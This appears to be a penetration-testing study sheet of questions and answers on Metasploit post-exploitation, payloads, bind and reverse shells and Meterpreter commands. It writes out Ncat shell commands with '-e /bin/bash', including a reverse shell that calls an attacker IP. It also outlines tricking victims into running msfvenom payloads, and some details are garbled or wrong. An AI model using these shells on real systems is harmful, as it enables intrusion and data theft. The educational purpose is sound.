17.2 Post-Exploitation with Meterpreter

Question 1

After successful exploitation, in which a session is established, Metasploit acts as a ___________ server, meaning it is able to ___________.

Answer 1

After successful exploitation, in which a session is established, Metasploit acts as a **command and control (C2)** server, meaning it is able to pass commands to exploited victim computers.

Question 2

C2 is a general term for what?

C2 is a vital technique for the post-exploitation phase of pen testing, when attackers will try to perform tasks such as ___________.

Answer 2

C2 is a general term for a non-standardized framework that controls sessions on infected hosts.

C2 is a vital technique for the post-exploitation phase of pen testing, when attackers will try to perform tasks such as data exfiltration (moving data from the victim computer to the host).

Question 3

Using Ncat what is the command to setup a listner on. a victim’s machine so you can connect to it from a attacker machine?

Answer 3

nc -lvnp 4444 -e /bin/bash

• -l: Tells Ncat to listen for incoming connection .
• -n: Indicates that we are listening for numeric IP addresses.
• -v: Means verbose, which will print more information about the connection.
• -p <port number>: Specifies which port to listen on. <br></br>- -e: Executes a bash shell, specifically, /bin/bash.</port>

Question 4

Using Ncat, how would you set up a reverse shell?

Answer 4

Using Ncat, set up a listener on the attacker’s machine that is prepared for the victim’s machine to connect back to it with the following commands:

On the attcker machine:

nc -lvnp 4444

Victim machine run:

nc 192.168.0.08 4444 -e /bin/bash

Question 5

A payload is the _______ that runs when an exploit successfully compromises a system.

Answer 5

A payload is the shell code that runs when an exploit successfully compromises a system.

Question 6

True or False:

Payloads will need to correspond to a specific OS and architecture.

Answer 6

True

A 64-bit payload is very different from a 32-bit payload.

Question 7

Some exploits can only handle a certain size payload. If a payload is too big, it will fail. To address this size issue, we can use either? What is the difference?

Answer 7

To address this size issue, we can use either **staged** or **stageless** payloads.

Staged payloads come in multiple parts in order to minimize their overall initial payload size. Upon exploitation, the payload calls the rest of the payload down from the “staged” location.

Stageless payloads are complete payloads, and are significantly larger than staged payloads.

Question 8

If the payload is successful, it will establish a ____. This is the connection between the target machine and attacking machine.

Answer 8

If the payload is successful, it will establish a shell. This is the connection between the target machine and attacking machine.

Question 9

Two notable types of shells are:

Answer 9

**Bind shells** use a payload that opens up a port on a victim host and listen on that port for an incoming connection from the attacker host. This allows the attacker to connect to the victim.

**Reverse shells** use a payload that automatically reaches out to the attacker host to establish a session.

Question 10

When shells are used maliciously like this, they are also referred to as _______.

Answer 10

**backdoors**

Question 11

In your own words, what is Meterpreter?

Answer 11

It’s the flagship or default payload of Metasploit. Meterpreter allows an attacker to control a victim’s computer by running an invisible shell and establishing a communication channel back to the attacking machine.

Question 12

When connecting to the remote host, does Meterpreter start new processes, similar to SSH or Ncat?

Answer 12

Unlike SSH and Ncat, Meterpreter does not start any new processes on the victim. Instead, it “injects” itself into a program that’s already running.

Question 13

True or False:

Meterpreter encrypts all communication to and from the victim machine.

Answer 13

True

For example, “windows/meterpreter/reverse_https” payload. This payload will communicate over HTTPS so it is less likely to be detected, and because it calls back to us, it is less likely to get picked up by a firewall as well. This is one of the standard reverse shells that we use in penetration testing.

Question 14

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to display the help menu?

Answer 14

?

Question 15

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to identify detailed Windows privilege information?

Answer 15

run win_privs

Question 16

Assuming that you have a Meterpreter shell, answer the following:

What command would you use to gather the victim’s system information?

Answer 16

sysinfo

Question 17

Assuming that you have a Meterpreter shell, answer the following:

What command lets you upload a readme.txt to your victim’s computer?

Answer 17

upload readme.txt

Question 18

Attackers often try to get a Meterpreter shell by tricking their victims into downloading an executable file that they’ve created. How is the file created in Kali?

Answer 18

• Create a custom payload using **msfvenom**.
• Send your target to your payload.
• Set up a listener using Metasploit.
  
  • For example: Running use windows/meterpreter/reverse_tcp and set payload windows/meterpreter/reverse_tcp and then defining the LHOST and LHOST.
• Wait until the victim has executed your exploit.

Question 19

With Metasploit, we can use Meterpreter to:

Answer 19

• Upload and download files to and from a target.
• Set up port forwarding through the target.
• Switch between Meterpreter shells.
• Run Metasploit modules on remote hosts.

Question 20

Opening a Meterpreter session on a target host consists of four main steps:

Answer 20

1. Exploiting the target.
2. Uploading a Meterpreter payload on the target.
3. Starting a TCP listener.
4. Executing the Meterpreter payload.

Question 21

The easiest way to open a Meterpreter shell is _____________.

A common payload is ___________.

Answer 21

The easiest way to open a Meterpreter shell is to select an exploit and set a Meterpreter payload.

A common payload is `windows/meterpreter/reverse_tcp

Question 22

You can have multiple Meterpreter sessions open on multiple machines.

Answer 22

True

Question 23

What are the commands needed to connect to a Meterpreter session?

Answer 23

• sessions: Lists all open Meterpreter sessions.
• sessions -i <session></session>: Connects to a designated session.
• sessions -i 1: Brings our session to the foreground, meaning any command we run on our host machine will be run on the Meterpreter shell on the target.

Question 24

Once we’ve connected to a Meterpreter session, what are some commands can you run to get infomration on the target? (9)

Answer 24

?: Prints Meterpreter’s help page, which lists all possible commands.

getuid: Prints user ID.

getwd: Prints current working directory.

ifconfig: Prints the victim’s network information.

sysinfo: Gathers system information (OS, architecture, kernel version).

upload: Uploads a file to the target.

download: Downloads a file from the target.

search: Searches for resources, similar to the find command in Linux.

run win_privs: Provides more detailed Windows privilege information.

run win_enum: Runs a comprehensive suite of Windows enumerations and stores the results on the attacking machine.